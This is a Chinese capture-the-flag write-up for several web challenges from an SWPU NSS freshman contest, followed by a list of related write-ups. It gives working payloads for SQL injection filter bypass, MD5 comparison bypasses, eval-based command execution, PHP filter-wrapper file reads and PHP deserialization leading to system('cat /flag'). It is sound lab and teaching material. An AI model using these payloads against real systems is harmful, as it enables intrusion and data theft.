ez_sql:

首先我们进入环境，会发现给了如下提示

提示让我们相对安全的方式传参，所以使用POST方式传，然后参数是nss，之后我们先试试nss=1，会返回给我们两个flag

显然这两个flag都是假的flag，但是天真的我还是去试了试。然后我们用nss=1’看看是不是字符型注入，然后给我们返回了报错信息

通过报错信息我们可以看到是单引号的字符型注入，然后我们用order by来看看有几列，会发现有报错信息

通过报错信息我们可以知道，过滤了or和去除了空格，所以我们可以使用双写和/**/来分别进行绕过，如下：

经过检验之后我们可以得知数据库有3列，然后我们通过显错注入的方式，来对数据库名进行查询，可以看到当前的库名为NSS_db

接下来我们进行爆表名和列名，注意information，里面含有or会被过滤，所以需要双写。

爆出来两个表NSS_tb，users，然后我们进去爆一下列名

会发现图中的几个列，如果显示不全的话，用mid函数截取一下即可，然后我们逐个查看，最后我们会在Secr3t发现flag。

webdog1__start：

进入环境，没有什么有用的信息，查看源码，会发现给我们的题目是传一个值，使他的md5加密后的值与他的原值相同，通过查找文档了解到0e215962017可以

payload:?web=0e215962017

传入后会跳转到一个页面

跳转到这个页面之后，能点的都点了，并没有发现提示在哪里，只有一些大佬的文章，于是我们只能使用bp进行抓包，看看有没有什么提示。

抓到包之后发现在返回包中存在hint。然后我们访问这个页面

访问之后又让我们继续去访问下一个

<?php
error_reporting(0);highlight_file(__FILE__);if (isset($_GET['get'])){$get=$_GET['get'];if(!strstr($get," ")){$get = str_ireplace("flag", " ", $get);if (strlen($get)>18){die("This is too long.");}else{eval($get);} }else {die("nonono"); }}    ?>

题目如上，是一个命令执行的题，大概意思是我们传入的值不能有空格，并且会将我们传入的字符串中的flag替换为空格，并且字符串长度不能超过18。我们构造如下payload

payload:?get=system('nl%09/f*');

where_am_i:

进入题目后会给我们一张图，并给我们提示，什么是11位？首先想到的就是手机号，结合图片，可以想到会不会是这个酒店的手机号，于是把图下载下来，然后去识图网站识图，可以知道，这个地方是成都古迹酒店，然后将手机号填入就可以了

奇妙的MD5

查看head，发现有md5绕过

查了查资料后发现可以使用万能绕过字符绕过ffifdyop，原理是函数将这个MD5加密后，会被再次转换位字符串，变成’or’6，此时函数一定为真。然后会跳转到下一个题目

显然这是一个弱类型的md5比较，我们直接使用数组绕过的方式进行绕过

payload:?x[]=1&y[]=2

ez_ez_php(revenge):

进入环境后直接显示源码如下：

<?php
error_reporting(0);
if (isset($_GET['file'])) {if ( substr($_GET["file"], 0, 3) === "php" ) {echo "Nice!!!";include($_GET["file"]);} else {echo "Hacker!!";}
}else {highlight_file(__FILE__);
}
//flag.php

通过题目可以得知传入的值前三位必须要是php，那么我们最先想到的就是php的伪协议

?file=php://filter/read=convert.base64-encode/resource=/flag

传入之后我们可以得到一串base64的码，进行转码后就可以得到flag了

numgame:

进入环境之后只有一个小小的加法框，并没有找到什么提示，f12查看源码也看不到，于是我们用view-source:来查看源码

发现存在/js/1.js 文件，查看之后会发现一串base64代码

解码之后会得到一个新的网页，我们进入访问会得到最后一道题

<?php
error_reporting(0);
//hint: 与get相似的另一种请求协议是什么呢
include("flag.php");
class nss{static function ctf(){include("./hint2.php");}
}
if(isset($_GET['p'])){if (preg_match("/n|c/m",$_GET['p'], $matches))die("no");call_user_func($_GET['p']);
}else{highlight_file(__FILE__);
}

发现正则过滤了n和c，但是并没有区分大小写，所以我们可以直接大小写绕过。

传值之后，会给我们提示

payload:?p[]=Nss2&p[]=Ctf

1z_unserialize :

进入后拿到源码

<?phpclass lyh{public $url = 'NSSCTF.com';public $lt;public $lly;function  __destruct(){$a = $this->lt;$a($this->lly);}}
unserialize($_POST['nss']);
highlight_file(__FILE__);?>

构造exp

<?phpclass lyh{public $url = 'NSSCTF.com';public $lt = 'assert';public $lly = 'system("cat /flag");';
}$l = new lyh;echo serialize($l);?>

ez_ez_unserialize:

源码：

<?php
class X
{public $x = __FILE__;function __construct($x){$this->x = $x;}function __wakeup(){if ($this->x !== __FILE__) {$this->x = __FILE__;}}function __destruct(){highlight_file($this->x);//flag is in fllllllag.php}
}
if (isset($_REQUEST['x'])) {@unserialize($_REQUEST['x']);
} else {highlight_file(__FILE__);
}

根据题目分析，可以得知x需要使用php伪协议来进行读取flag文件，由此，我们可以构造EXP

<?php
class X{public $x = 'php://filter/read=convert.base64-encode/resource=fllllllag.php';
}
$obj = new x;
echo serialize($obj);

题中还有一个知识点，就是魔法函数wakeup的绕过。

最终的payload为

?x=O:1:"X":2:{s:1:"x";s:62:"php://filter/read=convert.base64-encode/resource=fllllllag.php";}

拿到之后进行base64解码就可以得到flag。

funny_php：

进入环境之后我们可以直接看到源码，如下：

<?phpsession_start();highlight_file(__FILE__);if(isset($_GET['num'])){if(strlen($_GET['num'])<=3&&$_GET['num']>999999999){echo ":D";$_SESSION['L1'] = 1;}else{echo ":C";}}if(isset($_GET['str'])){$str = preg_replace('/NSSCTF/',"",$_GET['str']);if($str === "NSSCTF"){echo "wow";$_SESSION['L2'] = 1;}else{echo $str;}}if(isset($_POST['md5_1'])&&isset($_POST['md5_2'])){if($_POST['md5_1']!==$_POST['md5_2']&&md5($_POST['md5_1'])==md5($_POST['md5_2'])){echo "Nice!";if(isset($_POST['md5_1'])&&isset($_POST['md5_2'])){if(is_string($_POST['md5_1'])&&is_string($_POST['md5_2'])){echo "yoxi!";$_SESSION['L3'] = 1;}else{echo "X(";}}}else{echo "G";echo $_POST['md5_1']."\n".$_POST['md5_2'];}}if(isset($_SESSION['L1'])&&isset($_SESSION['L2'])&&isset($_SESSION['L3'])){include('flag.php');echo $flag;}?>

根据题目我们可以得知，如果最后想要拿到flag，需要将L1,L2,L3三个值都置为1，当让根据题目，想要使L1，L2，L3都为1，我们就需要解决3个问题。

第一题如下：

if(isset($_GET['num'])){if(strlen($_GET['num'])<=3&&$_GET['num']>999999999){echo ":D";$_SESSION['L1'] = 1;}else{echo ":C";}}

题目意思是让我们只用三个字符，来表示比999999999值大，那么我们首先想到的就是科学计数法

可以用1e9来表示。

第二道题如下：

if(isset($_GET['str'])){$str = preg_replace('/NSSCTF/',"",$_GET['str']);if($str === "NSSCTF"){echo "wow";$_SESSION['L2'] = 1;}else{echo $str;}}

题目意思是会将你传入字符串中的NSSCTF替换为空，那么我们只需要使用双写来进行绕过即可。

第三道题如下：

if(isset($_POST['md5_1'])&&isset($_POST['md5_2'])){if($_POST['md5_1']!==$_POST['md5_2']&&md5($_POST['md5_1'])==md5($_POST['md5_2'])){echo "Nice!";if(isset($_POST['md5_1'])&&isset($_POST['md5_2'])){if(is_string($_POST['md5_1'])&&is_string($_POST['md5_2'])){echo "yoxi!";$_SESSION['L3'] = 1;}else{echo "X(";}}}else{echo "G";echo $_POST['md5_1']."\n".$_POST['md5_2'];}}

很明显，这是一道弱类型的MD5比较，直接传值即可。

payload：

这是我第一次写文章，如果文章里面写的有哪些不足之处，欢迎大家来帮忙指正，我现在还只是一个刚刚入门的小菜鸡，希望大家可以多多包含

SWPU NSS新生赛校外通道(部分WP)相关推荐

【SWPU NSS新生赛校外通道】web：奇妙的MD5、whereami、webdog1__start、ez_ez_php、ez_ez_php(revenge)
1.奇妙的MD5 查看head,发现有md5绕过这边有一个算是万能绕过的字符:ffifdyop,根据函数md5加密后,再次转换为字符串时,会变成'or'6,此时函数一定为真.(具体内容可以查一查md ...
SWPU NSS新生赛（校外通道）
exp记录 ord(x):将ascii字符转换为int chr(x):将int转为ascii字符 s1="LQQAVDyZMP]3q]emmf]uc{]vm]glap{rv]dnce&quo ...
2022 SWPU NSS新生赛|MISC知识点
这不是一篇WP,更类似于交流讨论,文章所涉及的知识点和工具也仅针对题目而言,错误之处,批评指正. 1.Crack Me 知识点: a.伪加密:ZipCenOp.jar b.解压缩报错处理:手工处理 c ...
CTF Crypto RSA合集（新生赛难度）
食用简介下面是本人新生赛时遇到的一些RSA密码题,题目名后大概写有类型便于查找题目较多可以选择性食用 1.buuctf RSA 题目:在一次RSA密钥对生成中,假设p=473398607161,q ...
[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce
第一题:[SWPUCTF 2022 新生赛]ez_rce已解决 1.看一下,啥也没有,找一下robots.txt 2.访问一下,/NSS/index.php 3.thinkphp,直接找个工具嗦吧,咱 ...
SCU新生赛2021 pwn wp
前段时间的极客大挑战2021和2021年的SCU新生赛,最后一道题都没有做出来,作为一枚大二学长确实应该反省一下自己了.太菜了呜呜呜.极客大挑战因为打太久了,题目都快忘记了,就不写wp了. ret2t ...
CTF新生赛之Writeup
CTF新生赛之Writeup 作为零基础的新生,也是在开学后才了解了CTF,感觉本次新生赛中颇有收获,也是应赛制要求,故写下这份WP,以纪念本人的第一次CTF竞赛. 回顾和感想回顾本次的新生赛,难度 ...
BUU [ACTF新生赛2020]Universe_final_answer
[ACTF新生赛2020]Universe_final_answer 首先查壳, 64bit 无壳 ida64位打开 main() __int64 __fastcall main(int a1, ch ...
CTF笔记 [SWPUCTF 2021 新生赛]pop
文章目录一些常见魔术方法 [SWPUCTF 2021 新生赛]pop 总结这一类题目比较考验对一段代码的逻辑方面的理解,通过利用魔数方法进行互相调用,形成一条链子,利用这条链子将对象联系起来去拿f ...

SWPU NSS新生赛校外通道(部分WP)